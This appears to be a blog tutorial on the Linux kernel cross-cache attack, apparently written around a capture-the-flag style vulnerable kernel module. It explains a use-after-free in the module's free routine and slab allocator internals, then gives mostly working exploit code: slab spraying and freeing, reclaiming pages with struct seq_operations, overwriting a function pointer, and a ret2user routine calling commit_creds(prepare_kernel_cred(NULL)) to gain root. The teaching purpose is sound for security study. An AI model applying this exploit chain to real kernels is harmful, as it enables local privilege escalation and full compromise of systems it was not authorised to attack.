Linux Kernel Exploitation - Cross-Cache Attack

In this post, I will explain the cross-cache attack, a fundamental technique for advanced Linux kernel exploitation. Understanding it is a prerequisite for other exploitation techniques, such as Dirty PageTable and DirtyCred, which I will cover in future posts. Download the handouts beforehand.

Analysis

The vulnerable LKM provides three commands: CMD_ALLOC, CMD_WRITE, and CMD_FREE. These commands are used to allocate, write to, and free objects defined as follows:

    #define OBJ_SIZE 0x200

    struct obj {
        char buf[OBJ_SIZE];
    };
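
The exploit snippets later in this post call obj_alloc, obj_write, and obj_free from user space, but the wrappers themselves are not shown. The handout defines the real ioctl interface; what follows is only a minimal sketch of how such wrappers might look. The request layout (struct obj_req), the command numbers, and the helper names with the _fd suffix are all assumptions made for illustration and need to be replaced with the values from the handout.

```c
#include <stddef.h>
#include <sys/ioctl.h>

/* Hypothetical command numbers: replace with the values from the handout. */
#define CMD_ALLOC 0x1000
#define CMD_WRITE 0x1001
#define CMD_FREE  0x1002

/* Hypothetical request layout passed to the module through ioctl. */
struct obj_req {
    int id;            /* index into the module's objs[] array */
    size_t size;       /* number of bytes to copy for CMD_WRITE */
    const void *data;  /* user buffer for CMD_WRITE */
};

/* Each wrapper returns the raw ioctl result: -1 means the call failed. */
static int obj_alloc_fd(int fd, int id) {
    struct obj_req req = { .id = id, .size = 0, .data = NULL };
    return ioctl(fd, CMD_ALLOC, &req);
}

static int obj_write_fd(int fd, int id, const void *data, size_t size) {
    struct obj_req req = { .id = id, .size = size, .data = data };
    return ioctl(fd, CMD_WRITE, &req);
}

static int obj_free_fd(int fd, int id) {
    struct obj_req req = { .id = id, .size = 0, .data = NULL };
    return ioctl(fd, CMD_FREE, &req);
}
```

With a file descriptor obtained by opening the module's device node, obj_alloc(i) in the later snippets would correspond to obj_alloc_fd(fd, i) in this sketch.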

Note that obj_alloc and obj_free internally use kmem_cache_zalloc and kmem_cache_free, respectively. This means a dedicated cache is used for managing these objects:

    static long obj_alloc(int id) {
        /* Refuse to overwrite a slot that is already in use. */
        if (objs[id] != NULL) {
            return -1;
        }
        /* Allocate a zeroed object from the dedicated cache. */
        objs[id] = kmem_cache_zalloc(obj_cachep, GFP_KERNEL);
        if (objs[id] == NULL) {
            return -1;
        }
        return 0;
    }

    static long obj_free(int id) {
        kmem_cache_free(obj_cachep, objs[id]);
        return 0;
    }

The cache is created in module_initialize:

    static int __init module_initialize(void) {
        if (misc_register(&vuln_dev) != 0) {
            return -1;
        }
        /* KMEM_CACHE names the cache after the struct, so it appears as "obj". */
        obj_cachep = KMEM_CACHE(obj, 0);
        if (!obj_cachep) {
            return -1;
        }
        return 0;
    }

Bugs

In obj_free, objs[id], which is a reference to a freed memory region, is not cleared:

    static long obj_free(int id) {
        kmem_cache_free(obj_cachep, objs[id]);
        /* objs[id] is not reset to NULL here, so it keeps pointing at freed memory. */
        return 0;
    }

This results in an obvious UAF. Since we already have a write primitive, it’s natural to think about overlapping the freed objects with useful kernel objects, such as struct seq_operations or struct tty_struct, to overwrite function pointers and control RIP. However, we cannot do this directly: the objects are allocated from a dedicated cache, so a freed slot is only ever reused for another struct obj. This is where the cross-cache attack comes in.

Cross-Cache Attack

The main idea of the cross-cache attack is to turn a dangling reference to an object into a dangling reference to its underlying pages. As you may know, kernel objects are allocated from slab caches, which consist of one or more slabs. Each slab is made up of 2^order pages and contains objs_per_slab objects. These values can be found in /sys/kernel/slab/<CACHE_NAME>.
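
To avoid hard-coding these values, they can be read at run time. The following is a minimal sketch, assuming the attribute files objs_per_slab, order, and cpu_partial are present under /sys/kernel/slab/<CACHE_NAME> and readable by the current user (on many systems this requires root). The helper names read_long_from_file and read_slab_attr are made up for this example.

```c
#include <stdio.h>

/* Read a single integer from a file such as
 * /sys/kernel/slab/<CACHE_NAME>/objs_per_slab.
 * Returns 0 on success and -1 if the file cannot be opened or parsed. */
static int read_long_from_file(const char *path, long *out) {
    FILE *f = fopen(path, "r");
    if (f == NULL) {
        return -1;
    }
    int ok = (fscanf(f, "%ld", out) == 1);
    fclose(f);
    return ok ? 0 : -1;
}

/* Build the sysfs path for one attribute of a slab cache and read it. */
static int read_slab_attr(const char *cache, const char *attr, long *out) {
    char path[256];
    int n = snprintf(path, sizeof(path), "/sys/kernel/slab/%s/%s", cache, attr);
    if (n < 0 || (size_t)n >= sizeof(path)) {
        return -1;  /* path did not fit into the buffer */
    }
    return read_long_from_file(path, out);
}
```

Because the module creates its cache with KMEM_CACHE(obj, 0), the cache is named obj, so a call such as read_slab_attr("obj", "objs_per_slab", &value) would be the natural way to query it in this challenge.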

When all objects in a slab are freed, its underlying pages are returned to the buddy allocator if the following additional conditions are met:

- The slab is not the active slab

- The per-cpu partial slab list is full

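This technique is extremely powerful. Once the pages are back in the buddy allocator, any other cache can claim them for a new slab, so in principle we can overlap the victim objects with any kernel object.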

Exploitation

First, we allocate objs_per_slab * (cpu_partial + 1) objects to prepare cpu_partial + 1 slabs, which will later be used to fill the per-cpu partial slab list:

    int objs_per_slab = 8;
    int cpu_partial = 52;
    int num_spray = objs_per_slab * (cpu_partial + 1);

    for (int i = 0; i < num_spray; i++) {
        obj_alloc(i);
    }

Next, we allocate one object to create a new active slab:

    obj_alloc(num_spray);

Next, we free objects in the slabs obtained in the first step to fill the per-cpu partial slab list and release the underlying order-0 pages. To increase reliability, we free every object only in even-numbered slabs; in odd-numbered slabs we free a single object, which makes the slab partial without emptying it. This is because if contiguous pages are freed, the buddy allocator merges them into higher-order pages, which makes them more difficult to reclaim later:

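    for (int i = 0; i < num_spray; i += objs_per_slab) {
        if (i % (objs_per_slab * 2) == 0) {
            /* Even-numbered slab: free every object so the slab becomes empty. */
            for (int j = i; j < i + objs_per_slab; j++) {
                obj_free(j);
            }
        } else {
            /* Odd-numbered slab: free one object so the slab becomes partial. */
            obj_free(i);
        }
    }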
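
The effect of the loop above can be checked with a small user-space model. This is only a sketch: it assumes that objects are handed out slab by slab in allocation order, so that object id lives in slab id / objs_per_slab, which is not guaranteed on a real system. The function names are invented for this example.

```c
#include <stdbool.h>

/* Slab that the id-th sprayed object is assumed to live in.
 * Assumption: objects are handed out slab by slab in allocation order. */
static int slab_index(int id, int objs_per_slab) {
    return id / objs_per_slab;
}

/* True if the freeing loop frees object `id`: every object of an
 * even-numbered slab, but only the first object of an odd-numbered one. */
static bool is_freed(int id, int objs_per_slab) {
    if (slab_index(id, objs_per_slab) % 2 == 0) {
        return true;
    }
    return id % objs_per_slab == 0;
}

/* Count how many of the num_slabs sprayed slabs end up completely empty. */
static int count_empty_slabs(int num_slabs, int objs_per_slab) {
    int empty = 0;
    for (int s = 0; s < num_slabs; s++) {
        bool all_freed = true;
        for (int j = 0; j < objs_per_slab; j++) {
            if (!is_freed(s * objs_per_slab + j, objs_per_slab)) {
                all_freed = false;
            }
        }
        if (all_freed) {
            empty++;
        }
    }
    return empty;
}
```

With objs_per_slab = 8 and cpu_partial + 1 = 53 sprayed slabs, this model reports 27 empty slabs (indices 0, 2, ..., 52) and 26 partial ones, so under the model's assumption no two emptied slabs are neighbours in allocation order.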

Next, we allocate a large number of struct seq_operations so that the order-0 pages freed in the previous step are reused as kmalloc-32 slabs. Since kmalloc-32 also uses order-0 pages, the attack has a high chance of success:

    int seqfds[0x20];

    /* Each open() makes the kernel allocate one struct seq_operations. */
    for (int i = 0; i < 0x20; i++) {
        seqfds[i] = open("/proc/self/stat", O_RDONLY);
        assert(seqfds[i] >= 0);
    }
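
Why struct seq_operations ends up in kmalloc-32 and lines up with the stale objects can be verified with a user-space mirror of the structure. The sketch below assumes a 64-bit target and a slab layout without per-object debug metadata, so that slots are packed at a 32-byte stride from the start of the page. The mirror type and the simplified void * argument types are illustrative, not the kernel's exact declarations.

```c
#include <assert.h>
#include <stddef.h>

#define OBJ_SIZE 0x200

/* User-space mirror of the kernel's struct seq_operations: four function
 * pointers. Argument types are simplified to void * for illustration. */
struct seq_operations_mirror {
    void *(*start)(void *m, long long *pos);
    void (*stop)(void *m, void *v);
    void *(*next)(void *m, void *v, long long *pos);
    int (*show)(void *m, void *v);
};

/* On a 64-bit target, four pointers occupy 32 bytes, hence kmalloc-32. */
static_assert(sizeof(struct seq_operations_mirror) == 32,
              "expected 64-bit pointers");
/* start is the first member, so a write at offset 0 replaces it. */
static_assert(offsetof(struct seq_operations_mirror, start) == 0,
              "start must be the first member");
/* OBJ_SIZE is a multiple of 32, so each stale obj begins on a slot boundary. */
static_assert(OBJ_SIZE % sizeof(struct seq_operations_mirror) == 0,
              "obj must cover whole slots");

/* Number of 32-byte slots that one stale 0x200-byte obj spans. */
static size_t slots_per_obj(void) {
    return OBJ_SIZE / sizeof(struct seq_operations_mirror);
}
```

Each dangling struct obj therefore covers 16 consecutive 32-byte slots, and its first 8 bytes coincide with the start pointer of whatever seq_operations occupies the first of those slots.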

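Finally, we use CMD_WRITE to overwrite function pointers in struct seq_operations and control RIP. The 8-byte payload lands on the first member, start, which the kernel calls when we read from the file. Since SMAP, SMEP, KASLR, and KPTI are disabled, we can easily escalate privileges via ret2user: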

    char payload[0x8];
    *(unsigned long *)payload = (unsigned long)escalate_privilege;

    /* Write through the dangling references into the fully freed (even) slabs. */
    for (int i = 0; i < num_spray; i += objs_per_slab) {
        if (i % (objs_per_slab * 2) == 0) {
            obj_write(i, payload, 0x8);
        }
    }

    /* Reading from each file makes the kernel call the overwritten pointer. */
    for (int i = 0; i < 0x20; i++) {
        read(seqfds[i], payload, 1);
    }
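
The payload points at escalate_privilege, which is not shown above. A typical ret2user routine calls commit_creds(prepare_kernel_cred(NULL)) through raw kernel addresses. The following is only a sketch of that idea, not the handout's actual code: the two address globals and the lookup_symbol helper are assumptions introduced here, and the addresses have to be filled in from the target kernel (with KASLR disabled they are fixed across boots). On newer kernels prepare_kernel_cred(NULL) may be rejected, in which case a different credential source is needed.

```c
#include <stdio.h>
#include <string.h>

/* Kernel function signatures, simplified to void * so this compiles in user space. */
typedef void *(*prepare_kernel_cred_t)(void *daemon);
typedef int (*commit_creds_t)(void *new_cred);

/* Hypothetical globals: must be set before the overwritten pointer is triggered. */
static unsigned long prepare_kernel_cred_addr;
static unsigned long commit_creds_addr;

/* Look up a symbol in a kallsyms-style stream ("<hex address> <type> <name>").
 * Returns 0 if the symbol is not found. */
static unsigned long lookup_symbol(FILE *f, const char *name) {
    char line[512], sym[256], type;
    unsigned long addr;
    while (fgets(line, sizeof(line), f) != NULL) {
        if (sscanf(line, "%lx %c %255s", &addr, &type, sym) == 3 &&
            strcmp(sym, name) == 0) {
            return addr;
        }
    }
    return 0;
}

/* Executed in kernel mode when the kernel calls the overwritten pointer.
 * Only works because SMEP, SMAP, and KPTI are disabled in this challenge. */
static void escalate_privilege(void) {
    prepare_kernel_cred_t pkc = (prepare_kernel_cred_t)prepare_kernel_cred_addr;
    commit_creds_t cc = (commit_creds_t)commit_creds_addr;
    cc(pkc(NULL));
}
```

One way to fill in the globals is to pass a stream opened on /proc/kallsyms to lookup_symbol, keeping in mind that unprivileged readers may see all addresses as zero depending on the kptr_restrict setting.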



By running this exploit, we can achive root privileges and see the flag:

References

- Awarau and pql. 2022. CVE-2022-29582. https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/#crossing-the-cache-boundary

- Imran Khan. 2022. Linux SLUB Allocator Internals and Debugging, Part 1 of 4. https://blogs.oracle.com/linux/post/linux-slub-allocator-internals-and-debugging-1